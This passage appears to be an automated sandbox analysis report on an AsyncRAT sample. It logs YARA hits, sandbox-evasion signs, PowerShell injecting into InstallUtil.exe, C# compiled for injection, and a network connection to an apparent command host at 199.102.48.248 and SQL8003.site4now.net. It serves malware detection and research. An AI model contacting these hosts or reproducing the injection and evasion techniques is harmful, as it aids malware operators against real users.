Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected RUNPE

Source: Yara match	File source: 00000006.00000003.432425896.0000024667561000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535852707.000001D39DE83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.476766953.000001D3A6611000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.535670022.000001B3C4BF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\gia9ab2dg0.PS1, type: DROPPED

Yara detected AsyncRAT

Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8932f8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8b7a20.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbc0f38.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464f298700.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e8aba40.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3e6138.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e50f5c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbe5660.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.powershell.exe.1d38e3da290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.2464fbd9680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 924, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6428, type: MEMORYSTR

Source: C:\Windows\System32\wscript.exe TID: 7136	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6544	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4984	Thread sleep count: 6172 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912	Thread sleep count: 3199 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6652	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 240	Thread sleep count: 6515 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 240	Thread sleep count: 3038 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.dll			Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3374	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6172	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3199	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3336
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 6515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window / User API: threadDelayed 3038	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_00007FFEBC9A0FDD sldt word ptr [eax]

2_2_00007FFEBC9A0FDD

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File opened: c:\Users\user\AppData\Roaming\	Jump to behavior

Source: InstallUtil.exe, 0000000E.00000002.911146064.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hGFsj
Source: wscript.exe, 00000000.00000003.391544975.000001C9E3EBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.401953854.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.407672087.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392257266.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392112337.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.392759428.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.398093157.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.402007421.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.397854670.000001C9E3EB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.390175419.000001C9E3F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.407629768.000001C9E3EE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.402007421.000001C9E3F0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.402507852.000001C9E3EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
Source: wscript.exe, 00000000.00000003.402507852.000001C9E3EC4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 00000002.00000003.519628878.000001B3CCF4F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.536219164.000001B3CCF4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe	Network Connect: 199.102.48.248 1433			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Domain query: SQL8003.site4now.net

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1196008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 410000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 10EE008

Compiles code for process injection (via .Net compiler)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.0.cs

Jump to dropped file

.NET source code references suspicious native API functions

Source: 5arm45ue.dll.8.dr, GIT/NativeMethods.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/AntiProcess.cs	Reference to suspicious API methods: ('OpenProcess', 'OpenProcess@kernel32.dll')
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Connection/Win32.cs	Reference to suspicious API methods: ('LoadLibraryA', 'LoadLibraryA@kernel32'), ('GetProcAddress', 'GetProcAddress@kernel32')
